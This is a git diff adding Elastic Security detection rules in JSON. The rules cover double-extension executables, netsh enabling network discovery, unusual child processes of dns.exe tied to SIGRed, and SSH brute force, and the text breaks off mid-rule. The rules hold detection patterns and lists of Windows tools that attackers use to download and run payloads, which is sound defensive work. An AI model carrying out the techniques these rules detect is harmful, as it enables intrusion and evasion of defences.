a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Use Case: Vulnerability", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "8af5b42f-8d74-48c8-a8d0-6d14b4197288_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107.json new file mode 100644 index 00000000000..0df94945915 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Masquerading can allow an adversary to evade defenses and better blend in with the environment. One way it occurs is when the name or location of a file is manipulated as a means of tricking a user into executing what they think is a benign file type but is actually executable code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable File Creation with Multiple Extensions", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\" and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Users\\\\*\\\\QGIS_SCCM\\\\Files\\\\QGIS-OSGeo4W-*-Setup-x86_64.exe\") and\n file.path : \"?:\\\\Program Files\\\\QGIS *\\\\apps\\\\grass\\\\*.exe\") and\n not process.executable : (\"/bin/sh\", \"/usr/sbin/MailScanner\", \"/usr/bin/perl\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.007", + "name": "Double File Extension", + "reference": "https://attack.mitre.org/techniques/T1036/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json new file mode 100644 index 00000000000..c5bff9715be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Masquerading can allow an adversary to evade defenses and better blend in with the environment. One way it occurs is when the name or location of a file is manipulated as a means of tricking a user into executing what they think is a benign file type but is actually executable code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable File Creation with Multiple Extensions", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\" and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Users\\\\*\\\\QGIS_SCCM\\\\Files\\\\QGIS-OSGeo4W-*-Setup-x86_64.exe\") and\n file.path : \"?:\\\\Program Files\\\\QGIS *\\\\apps\\\\grass\\\\*.exe\") and\n not process.executable : (\"/bin/sh\", \"/usr/sbin/MailScanner\", \"/usr/bin/perl\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.007", + "name": "Double File Extension", + "reference": "https://attack.mitre.org/techniques/T1036/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_108.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_108.json new file mode 100644 index 00000000000..742c2d294d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_108.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe program to enable host discovery via the network. Attackers can use this command-line tool to weaken the host firewall settings.", + "false_positives": [ + "Host Windows Firewall planned system administration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enable Host Network Discovery via Netsh", + "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems with this setting enabled will communicate with other systems using broadcast messages, which can be used to identify targets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.name : \"netsh.exe\" and\nprocess.args : (\"firewall\", \"advfirewall\") and process.args : \"group=Network Discovery\" and process.args : \"enable=Yes\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8b4f0816-6a65-4630-86a6-c21c179c0d09_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json new file mode 100644 index 00000000000..1a48643b712 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8b4f0816-6a65-4630-86a6-c21c179c0d09_109.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe program to enable host discovery via the network. Attackers can use this command-line tool to weaken the host firewall settings.", + "false_positives": [ + "Host Windows Firewall planned system administration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enable Host Network Discovery via Netsh", + "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems with this setting enabled will communicate with other systems using broadcast messages, which can be used to identify targets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.name : \"netsh.exe\" and\nprocess.args : (\"firewall\", \"advfirewall\") and process.args : \"group=Network Discovery\" and process.args : \"enable=Yes\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "8b4f0816-6a65-4630-86a6-c21c179c0d09_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109.json new file mode 100644 index 00000000000..f414665f840 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "false_positives": [ + "Werfault.exe will legitimately spawn when dns.exe crashes, but the DNS service is very stable and so this is a low occurring event. Denial of Service (DoS) attempts by intentionally crashing the service will also cause werfault.exe to spawn." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process of dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Process of dns.exe\n\nSIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server versions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated privileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can effectively compromise the entire corporate infrastructure.\n\nThis rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a similar remote code execution vulnerability in the DNS server.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`).\n - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`, `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`.\n - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to `werfault.exe` occurring.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the host during the past 48 hours.\n- Check whether the server is vulnerable to CVE-2020-1350.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised server to a clean state.\n- Install the latest patches on systems that run Microsoft DNS Server.\n- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"dns.exe\" and\n not process.name : \"conhost.exe\"\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://github.com/maxpl0it/CVE-2020-1350-DoS", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json new file mode 100644 index 00000000000..f589f2dd3c2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "false_positives": [ + "Werfault.exe will legitimately spawn when dns.exe crashes, but the DNS service is very stable and so this is a low occurring event. Denial of Service (DoS) attempts by intentionally crashing the service will also cause werfault.exe to spawn." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process of dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Process of dns.exe\n\nSIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server versions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated privileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can effectively compromise the entire corporate infrastructure.\n\nThis rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a similar remote code execution vulnerability in the DNS server.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`).\n - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`, `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`.\n - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to `werfault.exe` occurring.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the host during the past 48 hours.\n- Check whether the server is vulnerable to CVE-2020-1350.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised server to a clean state.\n- Install the latest patches on systems that run Microsoft DNS Server.\n- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"dns.exe\" and\n not process.name : \"conhost.exe\"\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://github.com/maxpl0it/CVE-2020-1350-DoS", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_10.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_10.json new file mode 100644 index 00000000000..3299a128c46 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_10.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful SSH Brute Force Attack", + "note": "## Triage and analysis\n\n### Investigating Potential Successful SSH Brute Force Attack\n\nThe rule identifies consecutive SSH login failures followed by a successful login from the same source IP address to the same target host indicating a successful attempt of brute force password guessing.\n\n#### Possible investigation steps\n\n- Investigate the login failure user name(s).\n- Investigate the source IP address of the failed ssh login 